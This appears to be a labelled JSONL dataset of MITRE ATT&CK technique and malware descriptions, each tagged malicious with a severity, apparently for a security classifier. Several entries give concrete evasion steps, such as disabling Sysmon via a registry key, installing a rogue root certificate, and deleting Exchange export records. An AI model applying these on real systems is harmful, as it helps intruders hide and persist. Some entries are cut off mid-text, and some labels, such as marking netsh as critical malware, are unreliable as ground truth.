{"id": "mitre_00498", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Clear Mailbox Data\n\nTechnique: T1070.008\nTactics: defense-evasion\nPlatforms: Linux, macOS, Office Suite, Windows\n\nAdversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1070.008", "technique_name": "Clear Mailbox Data", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00499", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Temporary Elevated Cloud Access\n\nTechnique: T1548.005\nTactics: privilege-escalation, defense-evasion\nPlatforms: IaaS, Office Suite, Identity Provider\n\nAdversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existi", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1548.005", "technique_name": "Temporary Elevated Cloud Access", "tactics": ["privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00500", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disable or Modify Tools\n\nTechnique: T1562.001\nTactics: defense-evasion\nPlatforms: Containers, IaaS, Linux, macOS, Network Devices, Windows\n\nAdversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional. By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool\u2019s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the \u201cStart\u201d and \u201cEnable\u201d values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attem", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1562.001", "technique_name": "Disable or Modify Tools", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00501", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Plist Modification\n\nTechnique: T1150\nTactics: defense-evasion, persistence, privilege-escalation\nPlatforms: macOS\n\nProperty list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1150", "technique_name": "Plist Modification", "tactics": ["defense-evasion", "persistence", "privilege-escalation"]}}]}
{"id": "mitre_00502", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# TYPEFRAME\n\nType: malware\nPlatforms: Windows\n\n[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "TYPEFRAME", "malware_type": "malware"}}]}
{"id": "mitre_00503", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Malicious Library\n\nTechnique: T1204.005\nTactics: execution\nPlatforms: Linux, macOS, Windows\n\nAdversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. User may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency.(Citation: Datadog Security Labs Malicious PyPi Packages 2024)(Citation: Fortinet Malicious NPM Packages 2023)\n\nIn some cases, threat actors may compromise and backdoor existing popular libraries (i.e., [Compromise Software Dependencies and Development Tools](https://attack.mitre.org/techniques/T1195/001)). Alternatively, they may create entirely new packages and leverage behaviors such as typosquatting to encourage users to install them.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1204.005", "technique_name": "Malicious Library", "tactics": ["execution"]}}]}
{"id": "mitre_00504", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Prestige\n\nType: malware\nPlatforms: Windows\n\n[Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Prestige", "malware_type": "malware"}}]}
{"id": "mitre_00505", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SILENTTRINITY\n\nType: tool\nPlatforms: Windows\n\n[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SILENTTRINITY", "malware_type": "tool"}}]}
{"id": "mitre_00506", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Sliver\n\nType: tool\nPlatforms: Windows, Linux, macOS\n\n[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control (C2) framework written in Golang. [Sliver](https://attack.mitre.org/software/S0633) includes its own package manager, \"armory,\" for staging and downloading additional tools and payloads to the primary C2 framework.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: Cybereason Sliver Undated)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Sliver", "malware_type": "tool"}}]}
{"id": "mitre_00507", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# netsh\n\nType: tool\nPlatforms: Windows\n\n[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "netsh", "malware_type": "tool"}}]}
{"id": "mitre_00508", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# EKANS\n\nType: malware\nPlatforms: Windows\n\n[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "EKANS", "malware_type": "malware"}}]}
{"id": "mitre_00509", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# System Firmware\n\nTechnique: T1019\nTactics: persistence\nPlatforms: Windows\n\nThe BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1019", "technique_name": "System Firmware", "tactics": ["persistence"]}}]}
{"id": "mitre_00510", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Windows Management Instrumentation Event Subscription\n\nTechnique: T1084\nTactics: persistence\nPlatforms: Windows\n\nWindows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1084", "technique_name": "Windows Management Instrumentation Event Subscription", "tactics": ["persistence"]}}]}
{"id": "mitre_00511", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Ramsay\n\nType: malware\nPlatforms: Windows\n\n[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Ramsay", "malware_type": "malware"}}]}
{"id": "mitre_00512", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Windows Remote Management\n\nTechnique: T1021.006\nTactics: lateral-movement\nPlatforms: Windows\n\nAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1021.006", "technique_name": "Windows Remote Management", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00513", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LockBit 3.0\n\nType: malware\nPlatforms: Windows\n\n[LockBit 3.0](https://attack.mitre.org/software/S1202) is an evolution of the LockBit Ransomware-as-a-Service (RaaS) offering with similarities to BlackMatter and [BlackCat](https://attack.mitre.org/software/S1068) ransomware. [LockBit 3.0](https://attack.mitre.org/software/S1202) has been in use since at least June 2022 and features enhanced defense evasion and exfiltration tactics, robust encryption methods for Windows and VMware ESXi systems, and a more refined RaaS structure over its predecessors such as [LockBit 2.0](https://attack.mitre.org/software/S1199).(Citation: Sentinel Labs LockBit 3.0 JUL 2022)(Citation: Joint Cybersecurity Advisory LockBit JUN 2023)(Citation: Joint Cybersecurity Advisory LockBit 3.0 MAR 2023)(Citation: INCIBE-CERT LockBit MAR 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "LockBit 3.0", "malware_type": "malware"}}]}
{"id": "mitre_00514", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# System Network Configuration Discovery\n\nTechnique: T1016\nTactics: discovery\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1016", "technique_name": "System Network Configuration Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00515", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PinchDuke\n\nType: malware\nPlatforms: Windows\n\n[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PinchDuke", "malware_type": "malware"}}]}
{"id": "mitre_00516", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Abuse Elevation Control Mechanism\n\nTechnique: T1548\nTactics: privilege-escalation, defense-evasion\nPlatforms: Linux, macOS, Windows, IaaS, Office Suite, Identity Provider\n\nAdversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1548", "technique_name": "Abuse Elevation Control Mechanism", "tactics": ["privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00517", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exbyte\n\nType: malware\nPlatforms: Windows\n\n[Exbyte](https://attack.mitre.org/software/S1179) is an exfiltration tool written in Go that is uniquely associated with [BlackByte](https://attack.mitre.org/groups/G1043) operations. Observed since 2022, [Exbyte](https://attack.mitre.org/software/S1179) transfers collected files to online file sharing and hosting services.(Citation: Symantec BlackByte 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Exbyte", "malware_type": "malware"}}]}
{"id": "mitre_00518", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Rubeus\n\nType: tool\nPlatforms: Windows\n\n[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Rubeus", "malware_type": "tool"}}]}
{"id": "mitre_00519", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# StrelaStealer\n\nType: malware\nPlatforms: Windows\n\n[StrelaStealer](https://attack.mitre.org/software/S1183) is an information stealer malware variant first identified in November 2022 and active through late 2024. [StrelaStealer](https://attack.mitre.org/software/S1183) focuses on the automated identification, collection, and exfiltration of email credentials from email clients such as Outlook and Thunderbird.(Citation: DCSO StrelaStealer 2022)(Citation: PaloAlto StrelaStealer 2024)(Citation: Fortgale StrelaStealer 2023)(Citation: IBM StrelaStealer 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "StrelaStealer", "malware_type": "malware"}}]}
{"id": "mitre_00520", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Heyoka Backdoor\n\nType: malware\nPlatforms: Windows\n\n[Heyoka Backdoor](https://attack.mitre.org/software/S1027) is a custom backdoor--based on the Heyoka open source exfiltration tool--that has been used by [Aoqin Dragon](https://attack.mitre.org/groups/G1007) since at least 2013.(Citation: SentinelOne Aoqin Dragon June 2022)(Citation: Sourceforge Heyoka 2022) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Heyoka Backdoor", "malware_type": "malware"}}]}
{"id": "mitre_00521", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SLOWDRIFT\n\nType: malware\nPlatforms: Windows\n\n[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SLOWDRIFT", "malware_type": "malware"}}]}
{"id": "mitre_00522", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# System Location Discovery\n\nTechnique: T1614\nTactics: discovery\nPlatforms: IaaS, Linux, macOS, Windows\n\n\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1614", "technique_name": "System Location Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00523", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Snip3\n\nType: malware\nPlatforms: Windows\n\n[Snip3](https://attack.mitre.org/software/S1086) is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including [AsyncRAT](https://attack.mitre.org/software/S1087), [Revenge RAT](https://attack.mitre.org/software/S0379), [Agent Tesla](https://attack.mitre.org/software/S0331), and [NETWIRE](https://attack.mitre.org/software/S0198).(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Snip3", "malware_type": "malware"}}]}
{"id": "mitre_00524", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Browser Fingerprint\n\nTechnique: T1036.012\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc. The HTTP\u00a0User-Agent\u00a0request header\u00a0is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting\u00a0user agent.(Citation: Mozilla User Agent)\n\nAdversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers: Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036.012", "technique_name": "Browser Fingerprint", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00525", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Internal Spearphishing\n\nTechnique: T1534\nTactics: lateral-movement\nPlatforms: Windows, macOS, Linux, SaaS, Office Suite\n\nAfter they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)\n\nFor example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\n\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1534", "technique_name": "Internal Spearphishing", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00526", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Install Root Certificate\n\nTechnique: T1130\nTactics: defense-evasion\nPlatforms: Linux, Windows, macOS\n\nRoot certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1130", "technique_name": "Install Root Certificate", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00527", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Asynchronous Procedure Call\n\nTechnique: T1055.004\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1055.004", "technique_name": "Asynchronous Procedure Call", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
